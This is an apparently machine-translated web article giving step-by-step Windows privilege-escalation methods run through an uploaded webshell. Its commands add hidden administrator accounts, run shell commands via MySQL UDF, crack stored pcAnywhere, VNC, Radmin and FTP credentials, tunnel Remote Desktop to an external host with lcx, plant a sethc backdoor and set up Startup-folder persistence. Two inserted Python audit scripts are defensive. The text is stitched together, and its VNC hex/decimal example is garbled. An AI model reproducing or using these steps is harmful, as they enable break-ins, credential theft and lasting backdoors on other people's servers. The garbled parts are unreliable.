Introduction to common webshell elevation methods and webshell elevation

Source: Internet
Author: User
Tags pcanywhere


Privilege escalation via pcAnywhere:

1. Privilege escalation via pcAnywhere requires that pcAnywhere was installed to its default path, whose directory security permissions grant access to the Users group. If the administrator removes the Users and Power Users entries from the directory permissions, leaving only Administrators and SYSTEM, this method no longer works;

2. Using the webshell Trojan, find the host directory under the pcAnywhere directory. The .cif file there contains the account and password used to connect to pcAnywhere. Download the file, recover the password with a pcAnywhere password cracking tool, then install pcAnywhere on your own computer and connect to the target for a remote desktop session;

-----------

Privilege escalation using hash cracking:

1. Tools: ophcrack-win32-installer-3.3.0 (hash cracking software), Pwdump7 (hash dumping software), rainbow tables (password dictionary)

2. Idea: lateral movement. The administrator may use the same password on several servers, so after obtaining the password on one server we can try to log on to the others.

3. For example, add a user to the Administrators group: net user backlion 123456 /add

net localgroup administrators backlion /add

4. Run pwdump7 from a DOS prompt to view the user's hash: backlion:1003:2FB6717FC6897581AAD3B435B51404EE:da0rjd72f8d04983188ccd4ca257e44:::

5. Crack the user's password with ophcrack and the rainbow table

6. Prevention: a password longer than 14 characters cannot be stored as an LM hash, so it cannot be cracked this way. We recommend setting passwords of 15 characters; the more complex the password, the better.
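As an added defensive example (not part of the original article), this Python audit reads a pwdump-format listing like the one in step 4 and flags accounts that still carry an LM hash, which is exactly what the 15-character prevention advice above eliminates. The sample listing is constructed; only the first LM hash reuses the value shown in step 4.

```python
import re

# Known LM hash of an empty 7-character half: when LM storage is off
# (or the password is empty) both halves equal this constant.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM_HASH = EMPTY_LM_HALF * 2

# pwdump line layout: user:rid:lm_hash:nt_hash:comment:homedir:
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[^:]*):(?P<nt>[^:]*):[^:]*:[^:]*:$"
)


def audit_pwdump_line(line):
    """Classify one pwdump line. Returns a dict with:
    lm_present - a real LM hash is stored, so the password is 14
                 characters or fewer and exposed to rainbow tables
    short_half - the second LM half is the empty constant, so the
                 password is 7 characters or fewer (weakest case)
    """
    m = PWDUMP_RE.match(line.strip())
    if not m:
        raise ValueError("not a pwdump line: %r" % line)
    lm = m.group("lm").upper()
    is_hex = re.fullmatch(r"[0-9A-F]{32}", lm) is not None
    lm_present = is_hex and lm != EMPTY_LM_HASH
    short_half = lm_present and lm[16:] == EMPTY_LM_HALF
    return {"user": m.group("user"), "rid": int(m.group("rid")),
            "lm_present": lm_present, "short_half": short_half}


def accounts_with_lm_hash(dump_text):
    """Names of accounts in a pwdump listing that still carry an LM hash,
    i.e. the accounts a 15-character password policy would protect."""
    findings = [audit_pwdump_line(l) for l in dump_text.splitlines() if l.strip()]
    return [f["user"] for f in findings if f["lm_present"]]


# Constructed sample listing: the first LM hash is the one printed in
# step 4, every other hash is a made-up hex value, not a real credential.
SAMPLE_DUMP = """\
backlion:1003:2FB6717FC6897581AAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
svc_backup:1004:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
admin15:1005:AAD3B435B51404EEAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF:::
"""

if __name__ == "__main__":
    for line in SAMPLE_DUMP.splitlines():
        print(audit_pwdump_line(line))
    print("accounts with LM hash:", accounts_with_lm_hash(SAMPLE_DUMP))
```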

----------------

MySQL privilege escalation (udf.dll):

1. Files used: the su.php Trojan and the Linx MySQL BackDoor.php Trojan.

2. Default path of udf.dll: C:\Winnt\udf.dll (Windows 2000), C:\Windows\udf.dll (Windows 2003)

3. Find the MySQL configuration file in the website directory; common names are config.php, web.php and webconfig.php.

The configuration file looks like this:

$dbhost = 'localhost'; // database server, i.e. 127.0.0.1

$dbuser = 'root'; // database username

$dbpw = 'a'; // database password

$dbname = 'dz'; // database name

4. In su.php, enter host: 127.0.0.1, user: root, password: a, db: mysql, then enter the SQL command that adds the user: select state("net user backlion 123 /add & net localgroup administrators backlion /add")

Then use the net user command to check whether the user was added successfully.

5. In udf.php, enter host: 127.0.0.1, user: root, password: a, db: mysql, set the DLL export path to C:\Windows\udf.dll, and enter the following in the SQL command box:

create function shell returns string soname 'udf.dll'; // add the shell function from udf.dll

select shell('net user backlion$ 123456 /add'); // add a user

select shell('net localgroup administrators backlion$ /add'); // add the user to the Administrators group

select shell('C:\3389.exe'); // run the 3389 file placed on the C drive

drop function shell; // delete the function

select shell('netstat -an'); // check which ports are open

------------------------

Churrasco privilege escalation:

1. Tools used: the Windows 2003 0day exploit 03.exe and cmd.exe;

2. Upload 03.exe and cmd.exe to a readable directory through the webshell and switch to that directory. In the webshell, enter the path of our cmd.exe, for example c:/recyle/cmd.exe, then enter c:/recyle/03.exe "net user backlion 123 /add & net localgroup administrators backlion /add"

-----------------------------

Privilege escalation using the Sogou input method (6.0):

1. With Sogou input method version 6.0, use the webshell Trojan's file manager to find the path where Sogou is installed, then upload an ImeUtil.exe that replaces the original ImeUtil.exe. Once this program is loaded, an administrator account is added to the system automatically.

Username: sunwear, password: sunwear

--------------------

Lcx intranet port forwarding for Remote Desktop logon to a host on the intranet:

1. The target site's webshell has the wscript component enabled and a readable/writable directory, typically c:/recyle, to upload into.

2. Upload our cmd.exe and lcx.exe.

3. In the shell path enter c:/recyle/cmd.exe, then run c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389

4. In a local DOS prompt, run d:/lcx.exe listen 51 3333 to listen on port 51 and forward it to port 3333.

5. In the local Remote Desktop client, enter 127.0.0.1:3333.

---------------

G6 FTP (Gene6 FTP Server) elevation:

1. Default installation directory: C:\Program Files\Gene6 FTP Server

2. The password file is saved at C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini.

The configuration file looks like this:

[Server]

IP=127.0.0.1,8021 // port used

GrantAllAccessToLocalHost=0

[Acct=Administrator] // user name

Enabled=1

Rights=0

Password=21232F297A57A5A743894A0E4A801FC3 // MD5 password

3. Check in the webshell that the G6 FTP software is installed. The default installation path is

4. In the shell, enter C:\recycler\lcx.exe -tran 8022 127.0.0.1 8021.

5. Install the G6 FTP software locally. Enter the IP address of the target site, port 8022, user name administrator, and as password the value recovered from the MD5 hash;

---------------

Serv-U 6.4 privilege escalation:

1. Serv-U key: Keys + 1IGE9b4xDP0q2W + vE4vgZLA7unm6t3CxTI

2. In the commands section of Serv-U, enter cmd /c net user backlion$ 123 /add & net localgroup administrators backlion$ /add

3. The user is added.

4. Use this account to log on via Remote Desktop;

------------------

VNC password cracking and privilege escalation:

1. Read the VNC registry key value in the webshell. RealVNC registry path:

HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password

UltraVNC registry path:

HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password

The value is read as decimal and must be converted to hexadecimal, for example:

Hexadecimal: D7 51 CC 73 31 24 7A 93

Decimal: 12 7C EF 6E 0B 7A D9

2. Crack the VNC password: vncpwdump.exe D751CC7331247A93

3. Then install a VNC client locally for the remote connection.

----------------------

Radmin privilege escalation:

1. Check in the webshell that the Radmin program is installed;

2. Read the Radmin registry key value and convert the decimal value read to hexadecimal;

3. Connect directly with the Radmin hash tool, entering the hexadecimal value that was read;

4. Then connect with the Radmin client;

-----------------

360 Safeguard privilege escalation:

1. Upload cmd.exe and 360.exe to a readable directory, for example c:/recyle.

2. In the shell enter c:/recyle/cmd.exe, then run c:/recyle/360.exe sethc

3. Log on via Remote Desktop to the target IP address; a DOS window pops up, after which you can add a user name and password.

---------------------------

Startup item privilege escalation:

1. Through the webshell, upload a batch file that adds a user, for example net user backlion$ 123456 /add & net localgroup administrators backlion$ /add, saved as "The system was repaired.bat";

2. Then, in the webshell, enter the chosen startup path C:\Documents and Settings\Administrator\Start Menu\Programs\Startup and upload our batch file there;

3. The next time the administrator restarts the host, our account is added automatically;
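As an added defensive example (not part of the original article), this Python audit scans the contents of a Startup folder for batch files that create an account and add it to the local Administrators group, the persistence pattern described in the steps above. The folder contents are a constructed in-memory sample; in practice the mapping would be read from the Startup directory.

```python
import re

# The persistence above relies on two commands in a batch file:
# "net user <name> <password> /add" and
# "net localgroup administrators <name> /add". Both are matched case
# insensitively so "&"-chained one-liners are handled too.
ADD_USER_RE = re.compile(
    r"\bnet\s+user\s+(?P<name>[^\s/]+)\s+\S+\s+/add\b", re.IGNORECASE)
ADD_ADMIN_RE = re.compile(
    r"\bnet\s+localgroup\s+administrators\s+(?P<name>[^\s/]+)\s+/add\b",
    re.IGNORECASE)


def scan_script(content):
    """Return the accounts a script creates and the subset it also
    promotes to the local Administrators group."""
    created = {m.group("name") for m in ADD_USER_RE.finditer(content)}
    promoted = {m.group("name") for m in ADD_ADMIN_RE.finditer(content)}
    return {"created": sorted(created),
            "promoted_admins": sorted(created & promoted)}


def audit_startup_folder(files):
    """files: mapping of file name -> text content, as read from the
    Startup folder. Returns (file name, accounts) pairs for every batch
    file that creates a local administrator."""
    hits = []
    for name, content in files.items():
        if not name.lower().endswith((".bat", ".cmd")):
            continue
        result = scan_script(content)
        if result["promoted_admins"]:
            hits.append((name, result["promoted_admins"]))
    return sorted(hits)


# Constructed sample of a Startup folder's contents (file names and
# bodies are made up; the first one mirrors the batch file in step 1).
STARTUP_FILES = {
    "The system was repaired.bat":
        "net user backlion$ 123456 /add & net localgroup administrators backlion$ /add\r\n",
    "cleanup.bat": "@echo off\r\ndel /q %TEMP%\\*.log\r\n",
    "notes.txt": "net user backlion$ 123456 /add\r\n",
}

if __name__ == "__main__":
    for name, accounts in audit_startup_folder(STARTUP_FILES):
        print("%s creates local admin account(s): %s" % (name, ", ".join(accounts)))
```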
